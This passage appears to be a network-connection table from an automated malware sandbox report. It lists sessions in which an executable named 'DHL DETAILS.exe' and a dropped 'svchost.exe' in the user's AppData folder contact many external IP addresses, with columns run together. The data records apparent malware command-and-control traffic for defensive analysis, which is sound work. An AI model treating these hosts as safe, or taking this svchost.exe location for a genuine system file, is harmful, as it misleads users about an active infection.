                                                                                    5795192.168.2.55561761.133.66.69900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5796192.168.2.553568159.223.71.71591596352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5797192.168.2.5556778.210.80.1911567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5798192.168.2.55568043.155.170.351567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5799192.168.2.556016104.27.26.298043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5800192.168.2.549782162.241.6.97633606352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5801192.168.2.555996199.188.93.214900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5802192.168.2.555700148.72.215.794862343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5803192.168.2.550096162.214.225.223375816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5804192.168.2.55370923.225.72.12535036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5805192.168.2.554312192.111.137.3541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5806192.168.2.54962813.81.217.2018043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5807192.168.2.556075104.21.85.1098043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5808192.168.2.555710119.23.148.1738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5809192.168.2.556106172.67.181.378043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5810192.168.2.55575318.133.16.218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5811192.168.2.553722162.241.6.97505636352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5812192.168.2.555843104.249.29.74576743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5813192.168.2.556167104.23.141.1968043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5814192.168.2.556236104.19.124.1128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5815192.168.2.556246172.64.152.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5816192.168.2.556226162.159.242.2308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5817192.168.2.556216104.19.138.48043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5818192.168.2.556278104.24.15.1588043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5819192.168.2.54987992.205.110.47149366352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5820192.168.2.555812128.199.187.210800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5821192.168.2.55581962.33.207.2028043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5822192.168.2.55587594.130.94.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5823192.168.2.555890193.84.89.202844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5824192.168.2.555924107.148.201.1578043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5825192.168.2.555889154.12.178.1072998543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5826192.168.2.55593918.185.169.150312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5827192.168.2.55613238.162.8.226312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5828192.168.2.556138191.102.160.157312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5829192.168.2.556317104.16.107.2068043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5830192.168.2.550177161.97.173.42622896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5831192.168.2.556338162.159.242.1048043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5832192.168.2.550098176.194.189.40806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5833192.168.2.5560261.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5834192.168.2.55595639.99.144.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5835192.168.2.55583480.249.112.1628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5836192.168.2.550019103.74.100.19031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5837192.168.2.555746124.160.118.183808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5838192.168.2.555954178.54.21.203808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5839192.168.2.55603413.40.239.130312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5840192.168.2.556334209.121.164.503114743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5841192.168.2.555957148.66.130.187563043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5842192.168.2.556070194.145.209.187312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5843192.168.2.555997120.37.121.209909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5844192.168.2.556254181.78.11.21899943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5845192.168.2.55612582.113.157.1223128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5846192.168.2.562419103.172.42.237808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5847192.168.2.556427104.20.34.1008043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5848192.168.2.553663154.118.228.212806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5849192.168.2.55606243.131.242.1621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5850192.168.2.556033195.87.217.75338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5851192.168.2.556784202.159.60.6544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5852192.168.2.555904103.190.54.1418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5853192.168.2.556819202.159.60.6544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5854192.168.2.56246351.81.186.1795863056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5855192.168.2.564591203.76.121.237414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5856192.168.2.556824202.159.60.6544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5857192.168.2.556825202.159.60.6544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5858192.168.2.55682741.86.252.9144343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5859192.168.2.55683341.86.252.9144343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5860192.168.2.55613337.235.53.208678943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5861192.168.2.55685841.86.252.9144343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5862192.168.2.55686341.86.252.9144343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5863192.168.2.55612194.45.74.60808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5864192.168.2.556575203.30.191.348043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5865192.168.2.55360372.49.49.11310346352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5866192.168.2.556600104.19.5.2478043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5867192.168.2.556127148.66.130.531534543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5868192.168.2.556641104.16.108.428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5869192.168.2.556693104.20.235.1798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5870192.168.2.556208185.81.153.162338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5871192.168.2.55614361.178.152.31730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5872192.168.2.55620645.11.95.166600443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5873192.168.2.556051187.40.1.12212843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5874192.168.2.556698104.16.25.2168043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5875192.168.2.56463947.184.175.164312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5876192.168.2.550514162.241.207.217806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5877192.168.2.556003223.112.53.2102543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5878192.168.2.5563231.194.236.229500543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5879192.168.2.55036827.65.240.15710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5880192.168.2.55668851.79.87.1442250043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5881192.168.2.556732104.16.108.2348043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5882192.168.2.556733172.67.69.98043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5883192.168.2.555719117.160.250.1638043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5884192.168.2.556472125.141.139.60556643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5885192.168.2.55404146.219.1.556786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5886192.168.2.556816104.16.107.1428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5887192.168.2.55718843.157.51.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5888192.168.2.556561147.75.34.851000743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5889192.168.2.55721643.157.51.4344343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5890192.168.2.55721843.157.51.4344343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5891192.168.2.5563688.219.179.2371567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5892192.168.2.55722243.157.51.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5893192.168.2.55431443.255.113.23280836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5894192.168.2.55651745.231.133.518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5895192.168.2.55664016.163.88.2288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5896192.168.2.556584103.213.97.748043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5897192.168.2.55663851.75.126.1503414443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5898192.168.2.55664291.189.177.189312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5899192.168.2.556535128.199.202.122808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5900192.168.2.55677667.205.162.1031439843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5901192.168.2.55302889.145.162.8131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5902192.168.2.556915104.17.171.798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5903192.168.2.556937185.238.228.2028043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5904192.168.2.556714187.49.191.1499943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5905192.168.2.55389941.223.232.11731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5906192.168.2.5564045.202.104.22312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5907192.168.2.556955104.27.12.228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5908192.168.2.556996172.67.182.908043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5909192.168.2.557013172.67.182.228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5910192.168.2.556533103.152.232.148808543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5911192.168.2.554418104.248.151.220531776352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5912192.168.2.562535198.57.229.1856476756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5913192.168.2.5567135.252.23.220108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5914192.168.2.55670845.11.95.165603943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5915192.168.2.556697103.242.119.888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5916192.168.2.550717172.67.3.98806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5917192.168.2.556930107.180.88.415803743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5918192.168.2.55671988.99.138.21696943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5919192.168.2.550972156.232.9.19480806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5920192.168.2.557404178.128.157.11444343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5921192.168.2.55472750.63.12.101175596352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5922192.168.2.557407178.128.157.11444343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5923192.168.2.557413178.128.157.11444343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5924192.168.2.550410103.59.203.20941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5925192.168.2.557415178.128.157.11444343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5926192.168.2.55585636.134.91.82888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5927192.168.2.556536185.118.153.110808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5928192.168.2.557001162.241.6.976065143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5929192.168.2.557159104.16.105.1988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5930192.168.2.56258166.228.35.2091432156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5931192.168.2.55688743.163.192.31567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5932192.168.2.55701013.59.156.167312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5933192.168.2.55689072.195.34.58414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5934192.168.2.556748159.223.71.716051243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
